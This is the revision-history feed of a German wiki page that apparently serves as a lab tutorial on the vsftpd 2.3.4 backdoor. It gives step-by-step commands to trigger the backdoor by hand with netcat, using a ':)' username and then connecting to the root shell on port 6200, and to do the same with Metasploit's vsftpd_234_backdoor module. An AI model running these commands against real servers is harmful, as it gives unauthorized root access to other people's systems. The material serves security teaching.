https://wiki.ixheim.de/index.php?action=history&feed=atom&title=Metasploit_VSFTP_2.3.4 Metasploit VSFTP 2.3.4 - Versionsgeschichte 2026-04-09T02:43:18Z Versionsgeschichte dieser Seite in Xinux Wiki MediaWiki 1.35.1 https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&diff=55520&oldid=prev Thomas.will: /* Metasploit benutzen */ 2024-08-15T09:49:51Z <p><span dir="auto"><span class="autocomment">Metasploit benutzen</span></span></p> <table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface"> <col class="diff-marker" /> <col class="diff-content" /> <col class="diff-marker" /> <col class="diff-content" /> <tr class="diff-title" lang="de"> <td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td> <td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 15. August 2024, 09:49 Uhr</td> </tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l28" >Zeile 28:</td> <td colspan="2" class="diff-lineno">Zeile 28:</td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren</div></td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''msfconsole'''</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''msfconsole'''</div></td></tr> <tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">* '''search vsftp'''</ins></div></td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''use exploit/unix/ftp/vsftpd_234_backdoor'''</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''use exploit/unix/ftp/vsftpd_234_backdoor'''</div></td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''set RHOSTS ''IP.des.ftp.servers'' '''</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''set RHOSTS ''IP.des.ftp.servers'' '''</div></td></tr> </table> Thomas.will https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&diff=49001&oldid=prev Linkai.zhang: /* Metasploit benutzen */ 2023-08-30T11:17:45Z <p><span dir="auto"><span class="autocomment">Metasploit benutzen</span></span></p> <table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface"> <col class="diff-marker" /> <col class="diff-content" /> <col class="diff-marker" /> <col class="diff-content" /> <tr class="diff-title" lang="de"> <td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td> <td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 30. August 2023, 11:17 Uhr</td> </tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l28" >Zeile 28:</td> <td colspan="2" class="diff-lineno">Zeile 28:</td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren</div></td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''msfconsole'''</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''msfconsole'''</div></td></tr> <tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>* '''use exploit/unix/ftp/<del class="diffchange diffchange-inline">vsftp_234_backdoor</del>'''</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>* '''use exploit/unix/ftp/<ins class="diffchange diffchange-inline">vsftpd_234_backdoor</ins>'''</div></td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''set RHOSTS ''IP.des.ftp.servers'' '''</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''set RHOSTS ''IP.des.ftp.servers'' '''</div></td></tr> <tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''set RPORT 21 '''</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* '''set RPORT 21 '''</div></td></tr> </table> Linkai.zhang https://wiki.ixheim.de/index.php?title=Metasploit_VSFTP_2.3.4&diff=48998&oldid=prev Linkai.zhang: Die Seite wurde neu angelegt: „= Schwachstelle = * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt * Dabei wurde eine Bind-Shell auf TCP Por…“ 2023-08-30T10:46:54Z <p>Die Seite wurde neu angelegt: „= Schwachstelle = * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt * Dabei wurde eine Bind-Shell auf TCP Por…“</p> <p><b>Neue Seite</b></p><div>= Schwachstelle =<br /> <br /> * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt<br /> * Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man &quot;:)&quot; als Nutzernamen eingibt<br /> <br /> = Manuell nachspielen =<br /> <br /> * Zwei Terminals vorbereiten<br /> * Terminal 1 verbindet sich zum FTP-Server, nachdem der Exploit ausgeführt wurde, mit:<br /> * '''nc ''IP.des.ftp.servers'' 6200'''<br /> * Terminal 2 löst den Exploit aus<br /> * '''nc ''IP.des.ftp.servers'' 21'''<br /> * folgende Zeilen eingeben:<br /> <br /> USER user:)<br /> PASS pass<br /> <br /> * Wenn diese zwei Zeilen eingegeben wurden, kann man den Befehl auf Terminal 1 abschicken<br /> * Der Befehl sollte nach dem Ausführen nichts anzeigen, was bedeutet, dass die Verbindung aufgebaut wurde<br /> * folgedende Tests kann man durchführen, um zu sehen, ob man eine Shell hat:<br /> * '''ip a'''<br /> * '''id'''<br /> * '''pwd'''<br /> * '''ls'''<br /> <br /> = Metasploit benutzen =<br /> <br /> * Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren<br /> * '''msfconsole'''<br /> * '''use exploit/unix/ftp/vsftp_234_backdoor'''<br /> * '''set RHOSTS ''IP.des.ftp.servers'' '''<br /> * '''set RPORT 21 '''<br /> * '''set payload cmd/unix/interact'''<br /> * '''exploit'''<br /> * Nun sollte man genau wie oben eine sehr minimale Shell haben</div> Linkai.zhang